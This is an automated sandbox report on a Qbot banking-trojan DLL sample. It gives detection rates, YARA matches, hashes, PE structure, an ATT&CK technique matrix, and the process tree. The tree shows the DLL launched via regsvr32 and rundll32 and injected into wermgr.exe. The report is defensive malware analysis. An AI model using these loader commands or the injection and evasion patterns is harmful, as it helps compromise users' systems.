          Source: Yara matchFile source: 3.2.regsvr32.exe.730000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.wermgr.exe.e00000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.rundll32.exe.2cc0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.wermgr.exe.e00000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.regsvr32.exe.730000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.3.regsvr32.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.rundll32.exe.2cc0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.wermgr.exe.1000000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.wermgr.exe.e00000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.wermgr.exe.e00000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.wermgr.exe.e00000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.rundll32.exe.4820000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.wermgr.exe.1000000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000003.312922602.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.313259350.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.320649129.0000000004820000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.320603133.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.319688371.0000000001000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.312800639.0000000000400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.319841073.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.319924513.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.322491943.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.322126638.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | 3 Native API | 1 DLL Side-Loading | 311 Process Injection | 1 Masquerading | 1 Credential API Hooking | 1 System Time Discovery | Remote Services | 1 Screen Capture | Exfiltration Over Other Network Medium | 2 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 2 Virtualization/Sandbox Evasion | LSASS Memory | 14 Security Software Discovery | Remote Desktop Protocol | 1 Credential API Hooking | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 311 Process Injection | Security Account Manager | 2 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Archive Collected Data | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 Deobfuscate/Decode Files or Information | NTDS | 2 Process Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 2 Obfuscated Files or Information | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 Regsvr32 | Cached Domain Credentials | 35 System Information Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 Rundll32 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

          Behavior Graph
          ID: 719511, Sample: diatomaceous.dat.dll, Startdate: 10/10/2022, Architecture: WINDOWS, Score: 96
          Sample signatures: Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; Yara detected Qbot; 3 other signatures
          loaddll32.exe started: regsvr32.exe, cmd.exe, rundll32.exe, 2 other processes
          regsvr32.exe (Overwrites code with unconditional jumps - possibly settings hooks in foreign process; Writes to foreign memory regions; Allocates memory in foreign processes) started: wermgr.exe
          wermgr.exe (started by regsvr32.exe) dropped: C:\Users\user\Desktop\diatomaceous.dat.dll, PE32
          cmd.exe started: rundll32.exe
          rundll32.exe (started by cmd.exe; Overwrites code with unconditional jumps - possibly settings hooks in foreign process; Writes to foreign memory regions; Allocates memory in foreign processes; Maps a DLL or memory area into another process) started: wermgr.exe
          rundll32.exe (started by loaddll32.exe; Maps a DLL or memory area into another process) started: wermgr.exe

          Source | Detection | Scanner | Label | Link
          diatomaceous.dat.dll | 73% | ReversingLabs | Win32.Backdoor.Quakbot |
          diatomaceous.dat.dll | 77% | Virustotal | | Browse
          diatomaceous.dat.dll | 44% | Metadefender | | Browse
          diatomaceous.dat.dll | 100% | Joe Sandbox ML | |

          Source | Detection | Scanner | Label | Link
          C:\Users\user\Desktop\diatomaceous.dat.dll | 3% | Virustotal | | Browse
          C:\Users\user\Desktop\diatomaceous.dat.dll | 4% | ReversingLabs | |
          C:\Users\user\Desktop\diatomaceous.dat.dll | NaN% | Metadefender | | Browse

          Source | Detection | Scanner | Label | Link | Download
          8.2.wermgr.exe.e00000.0.unpack | 100% | Avira | HEUR/AGEN.1234562 | | Download File
          9.0.wermgr.exe.e00000.0.unpack | 100% | Avira | HEUR/AGEN.1234562 | | Download File
          5.2.rundll32.exe.2cc0000.1.unpack | 100% | Avira | HEUR/AGEN.1234562 | | Download File
          9.2.wermgr.exe.e00000.0.unpack | 100% | Avira | HEUR/AGEN.1234562 | | Download File
          8.0.wermgr.exe.e00000.0.unpack | 100% | Avira | HEUR/AGEN.1234562 | | Download File
          3.2.regsvr32.exe.730000.1.unpack | 100% | Avira | HEUR/AGEN.1234562 | | Download File
          7.0.wermgr.exe.1000000.0.unpack | 100% | Avira | HEUR/AGEN.1234562 | | Download File
          4.2.rundll32.exe.4820000.1.unpack | 100% | Avira | HEUR/AGEN.1234562 | | Download File
          No Antivirus matches
          No Antivirus matches
          No contacted domains info
          No contacted IP infos
          Joe Sandbox Version:36.0.0 Rainbow Opal
          Analysis ID:719511
          Start date and time:2022-10-10 17:03:44 +02:00
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 9m 22s
          Hypervisor based Inspection enabled:false
          Report type:full
          Sample file name:diatomaceous.dat.dll
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Run name:Run with higher sleep bypass
          Number of analysed new started processes analysed:15
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal96.troj.evad.winDLL@18/1@0/0
          EGA Information:
          • Successful, ratio: 100%
          HDC Information:
          • Successful, ratio: 73.2% (good quality ratio 68.1%)
          • Quality average: 75.3%
          • Quality standard deviation: 29.8%
          HCA Information:
          • Successful, ratio: 99%
          • Number of executed functions: 27
          • Number of non-executed functions: 68
          Cookbook Comments:
          • Found application associated with file extension: .dll
          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
          • Not all processes were analyzed, report is missing behavior information
          • Report creation exceeded maximum time and may have missing disassembly code information.
          No simulations
          No context
          No context
          No context
          No context
          Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
          C:\Users\user\Desktop\diatomaceous.dat.dll | diatomaceous.dat.dll | Get hash | malicious | Browse |
            Process:C:\Windows\SysWOW64\wermgr.exe
            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):4096
            Entropy (8bit):4.5939701639198445
            Encrypted:false
            SSDEEP:48:LtIesYew8vL36I8LgS72DsOA1dyqQrD1tXPFJhsppwAOY5iRYgZX0dB1mkK52wRa:aesqt2Dk1dyqIF9JhsLwAOhf2ZW2wIPD
            MD5:C79A1334A3C60DACEE5E43B715236A17
            SHA1:825F4CA853E99E10B81ABE84A1EB2CB6CFD3E8E7
            SHA-256:F892742F6C64A8991337FADDF84FBDB25C43022AC85C8BCC30D47FEBAFEA1D87
            SHA-512:D0B15BAAD608A3EF3AC13E881B9CCA7C27A56CC735AA7324C7AA677274C9FE73FA9B438FDC1B7B2C2B8717EC8949B0ECA605DF58A504F0A705576DC0BA7AF61D
            Malicious:true
            Antivirus:
            • Antivirus: Virustotal, Detection: 3%, Browse
            • Antivirus: ReversingLabs, Detection: 4%
            • Antivirus: Metadefender, Detection: NaN%, Browse
            Joe Sandbox View:
            • Filename: diatomaceous.dat.dll, Detection: malicious, Browse
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........B.[.,.[.,.[.,../.V.,..)..,..(.M.,...(.T.,.../.H.,...)...,..-.^.,.[.-.=.,..%.\.,..,.Z.,....Z.,.[...Z.,....Z.,.Rich[.,.................PE..L...n07c...........!....."..........n........@...............................@............@.............................l...l...<....`....................... ......................................p...@............@..\............................text...\!.......".................. ..`.rdata..<....@.......&..............@..@.data....,...0... ..................@....rsrc........`.......(..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
            File type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
            Entropy (8bit):6.8621600107462
            TrID:
            • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
            • Generic Win/DOS Executable (2004/3) 0.20%
            • DOS Executable Generic (2002/1) 0.20%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name:diatomaceous.dat.dll
            File size:393216
            MD5:2e7f90e0c595d88d28f9fd979ccfcf33
            SHA1:8ff540ba601429c2ee0a444b0d2ec2650d178d23
            SHA256:e3a2c056c730666fedabfed5e3cc2dee12d9c3ca36ac2d7c5289cfe29c125050
            SHA512:0ab199c211e7fe09b332c21da969d26ecccbd2947853c9a7793083e51c59b3aa6a765a0e1d2511c61672c49a60057a5bb05bf29eea33c074b95af55cb9e9a03f
            SSDEEP:6144:8WlZhgoMdtBYTNSlWBsAOrbd62IYQ8jjHH62uzdMPF699o9:Vl3goMdrb5J6wQ8faVn99o
            TLSH:AA846A0379D9BCB6C579123027379BE0C72DEC250BA0C9EF67D8196A4A3C2837525BE5
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........B.[.,.[.,.[.,.../.V.,...)...,...(.M.,...(.T.,.../.H.,...)...,...-.^.,.[.-.=.,...%.\.,...,.Z.,.....Z.,.[...Z.,.....Z.,.Rich[.,
            Icon Hash:64da98ecd2ceead4
            Entrypoint:0x10009b6e
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x10000000
            Subsystem:windows cui
            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
            Time Stamp:0x6337306E [Fri Sep 30 18:07:42 2022 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:6
            OS Version Minor:0
            File Version Major:6
            File Version Minor:0
            Subsystem Version Major:6
            Subsystem Version Minor:0
            Import Hash:5258e65ea568c264cf3e536d81339bf5
            Instruction
            push ebp
            mov ebp, esp
            cmp dword ptr [ebp+0Ch], 01h
            jne 00007F6C94BF9CF7h
            call 00007F6C94BFA1B2h
            push dword ptr [ebp+10h]
            push dword ptr [ebp+0Ch]
            push dword ptr [ebp+08h]
            call 00007F6C94BF9BA3h
            add esp, 0Ch
            pop ebp
            retn 000Ch
            cmp ecx, dword ptr [10033014h]
            jne 00007F6C94BF9CF3h
            ret
            jmp 00007F6C94BFA29Bh
            mov ecx, dword ptr [ebp-0Ch]
            mov dword ptr fs:[00000000h], ecx
            pop ecx
            pop edi
            pop edi
            pop esi
            pop ebx
            mov esp, ebp
            pop ebp
            push ecx
            ret
            push eax
            push dword ptr fs:[00000000h]
            lea eax, dword ptr [esp+0Ch]
            sub esp, dword ptr [esp+0Ch]
            push ebx
            push esi
            push edi
            mov dword ptr [eax], ebp
            mov ebp, eax
            mov eax, dword ptr [10033014h]
            xor eax, ebp
            push eax
            push dword ptr [ebp-04h]
            mov dword ptr [ebp-04h], FFFFFFFFh
            lea eax, dword ptr [ebp-0Ch]
            mov dword ptr fs:[00000000h], eax
            ret
            push eax
            push dword ptr fs:[00000000h]
            lea eax, dword ptr [esp+0Ch]
            sub esp, dword ptr [esp+0Ch]
            push ebx
            push esi
            push edi
            mov dword ptr [eax], ebp
            mov ebp, eax
            mov eax, dword ptr [10033014h]
            xor eax, ebp
            push eax
            mov dword ptr [ebp-10h], esp
            push dword ptr [ebp-04h]
            mov dword ptr [ebp-04h], FFFFFFFFh
            lea eax, dword ptr [ebp-0Ch]
            mov dword ptr fs:[00000000h], eax
            ret
            int3
            int3
            int3
            int3
            push ecx
            lea ecx, dword ptr [esp+08h]
            sub ecx, eax
            and ecx, 0Fh
            add eax, ecx
            sbb ecx, ecx
            or eax, ecx
            pop ecx
            jmp 00007F6C94BFA3DFh
            Name | Virtual Address | Virtual Size | Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x31800 | 0x6c | .rdata
            IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3186c | 0x3c | .rdata
            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x56000 | 0xb890 | .rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x62000 | 0x1da8 | .reloc
            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x2fb70 | 0x40 | .rdata
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_IAT | 0x24000 | 0x15c | .rdata
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
            Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
            .text | 0x1000 | 0x2215c | 0x22200 | False | 0.555016597985348 | data | 6.649026882960341 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            .rdata | 0x24000 | 0xe03c | 0xe200 | False | 0.5316993915929203 | data | 5.664939250342234 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .data | 0x33000 | 0x22ccc | 0x22000 | False | 0.8333668428308824 | DOS executable (block device driver \377\377\377\377\261) | 6.797248626276144 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .rsrc | 0x56000 | 0xb890 | 0xba00 | False | 0.17794438844086022 | data | 3.888171262767214 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .reloc | 0x62000 | 0x1da8 | 0x1e00 | False | 0.746484375 | data | 6.525986142096821 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
            Name | RVA | Size | Type | Language | Country
            RT_ICON | 0x56588 | 0xb13 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | Russian | Russia
            RT_ICON | 0x570a0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Russian | Russia
            RT_ICON | 0x57f48 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Russian | Russia
            RT_ICON | 0x587f0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Russian | Russia
            RT_ICON | 0x58d58 | 0xc4a | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | Russian | Russia
            RT_ICON | 0x599a8 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | Russian | Russia
            RT_ICON | 0x5dbd0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | Russian | Russia
            RT_ICON | 0x60178 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | Russian | Russia
            RT_ICON | 0x61220 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | Russian | Russia
            RT_GROUP_ICON | 0x61688 | 0x84 | data | Russian | Russia
            RT_VERSION | 0x562b0 | 0x2d4 | data | Russian | Russia
            RT_MANIFEST | 0x61710 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States
            DLL | Import
            KERNEL32.dll | Sleep, VirtualAlloc, GetCommandLineA, CreateFileW, GetFileSize, CloseHandle, CreateFileA, LocalAlloc, GetModuleFileNameA, DebugBreak, ReadFile, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, MultiByteToWideChar, LCMapStringEx, GetStringTypeW, GetCPInfo, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetModuleHandleW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, GetCurrentProcess, TerminateProcess, RtlUnwind, RaiseException, InterlockedFlushSList, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, HeapAlloc, HeapFree, GetStdHandle, GetFileType, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessHeap, SetFilePointerEx, SetStdHandle, HeapSize, FlushFileBuffers, WriteFile, GetConsoleOutputCP, GetConsoleMode, WriteConsoleW
            ADVAPI32.dll | CryptCreateHash, CryptHashData, CryptDestroyHash, CryptGetHashParam, CryptReleaseContext, CryptAcquireContextA
            Name | Ordinal | Address
            DllRegisterServer | 1 | 0x10006510
            DllUnregisterServer | 2 | 0x10007d50

            Language of compilation system | Country where language is spoken | Map
            Russian | Russia |
            English | United States |
            No network behavior found


            Target ID:0
            Start time:17:04:39
            Start date:10/10/2022
            Path:C:\Windows\System32\loaddll32.exe
            Wow64 process (32bit):true
            Commandline:loaddll32.exe "C:\Users\user\Desktop\diatomaceous.dat.dll"
            Imagebase:0xcc0000
            File size:116736 bytes
            MD5 hash:1F562FBF37040EC6C43C8D5EF619EA39
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:moderate

            Target ID:1
            Start time:17:04:39
            Start date:10/10/2022
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7c72c0000
            File size:625664 bytes
            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            Target ID:2
            Start time:17:04:39
            Start date:10/10/2022
            Path:C:\Windows\SysWOW64\cmd.exe
            Wow64 process (32bit):true
            Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\diatomaceous.dat.dll",#1
            Imagebase:0xd90000
            File size:232960 bytes
            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            Target ID:3
            Start time:17:04:39
            Start date:10/10/2022
            Path:C:\Windows\SysWOW64\regsvr32.exe
            Wow64 process (32bit):true
            Commandline:regsvr32.exe /s C:\Users\user\Desktop\diatomaceous.dat.dll
            Imagebase:0xe20000
            File size:20992 bytes
            MD5 hash:426E7499F6A7346F0410DEAD0805586B
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000003.00000003.312800639.0000000000400000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000003.00000003.312800639.0000000000400000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000003.00000003.312800639.0000000000400000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
            Reputation:high

            Target ID:4
            Start time:17:04:39
            Start date:10/10/2022
            Path:C:\Windows\SysWOW64\rundll32.exe
            Wow64 process (32bit):true
            Commandline:rundll32.exe "C:\Users\user\Desktop\diatomaceous.dat.dll",#1
            Imagebase:0xc50000
            File size:61952 bytes
            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000004.00000003.312922602.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000004.00000003.312922602.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000004.00000003.312922602.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000004.00000002.320649129.0000000004820000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000004.00000002.320649129.0000000004820000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000004.00000002.320649129.0000000004820000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
            Reputation:high

            Target ID:5
            Start time:17:04:39
            Start date:10/10/2022
            Path:C:\Windows\SysWOW64\rundll32.exe
            Wow64 process (32bit):true
            Commandline:rundll32.exe C:\Users\user\Desktop\diatomaceous.dat.dll,DllRegisterServer
            Imagebase:0xc50000
            File size:61952 bytes
            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000005.00000003.313259350.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000005.00000003.313259350.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000005.00000003.313259350.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000005.00000002.320603133.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000005.00000002.320603133.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000005.00000002.320603133.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
            Reputation:high

            Target ID:6
            Start time:17:04:42
            Start date:10/10/2022
            Path:C:\Windows\SysWOW64\rundll32.exe
            Wow64 process (32bit):true
            Commandline:rundll32.exe C:\Users\user\Desktop\diatomaceous.dat.dll,DllUnregisterServer
            Imagebase:0xc50000
            File size:61952 bytes
            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            Target ID:7
            Start time:17:04:44
            Start date:10/10/2022
            Path:C:\Windows\SysWOW64\wermgr.exe
            Wow64 process (32bit):true
            Commandline:C:\Windows\SysWOW64\wermgr.exe
            Imagebase:0x1160000
            File size:191904 bytes
            MD5 hash:CCF15E662ED5CE77B5FF1A7AAE305233
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000007.00000000.319688371.0000000001000000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000007.00000000.319688371.0000000001000000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000007.00000000.319688371.0000000001000000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

            Target ID:8
            Start time:17:04:44
            Start date:10/10/2022
            Path:C:\Windows\SysWOW64\wermgr.exe
            Wow64 process (32bit):true
            Commandline:C:\Windows\SysWOW64\wermgr.exe
            Imagebase:0x1160000
            File size:191904 bytes
            MD5 hash:CCF15E662ED5CE77B5FF1A7AAE305233
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000008.00000000.319841073.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000008.00000000.319841073.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000008.00000000.319841073.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000008.00000002.322126638.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000008.00000002.322126638.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000008.00000002.322126638.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

            Target ID:9
            Start time:17:04:44
            Start date:10/10/2022
            Path:C:\Windows\SysWOW64\wermgr.exe
            Wow64 process (32bit):true
            Commandline:C:\Windows\SysWOW64\wermgr.exe
            Imagebase:0x1160000
            File size:191904 bytes
            MD5 hash:CCF15E662ED5CE77B5FF1A7AAE305233
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000009.00000000.319924513.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
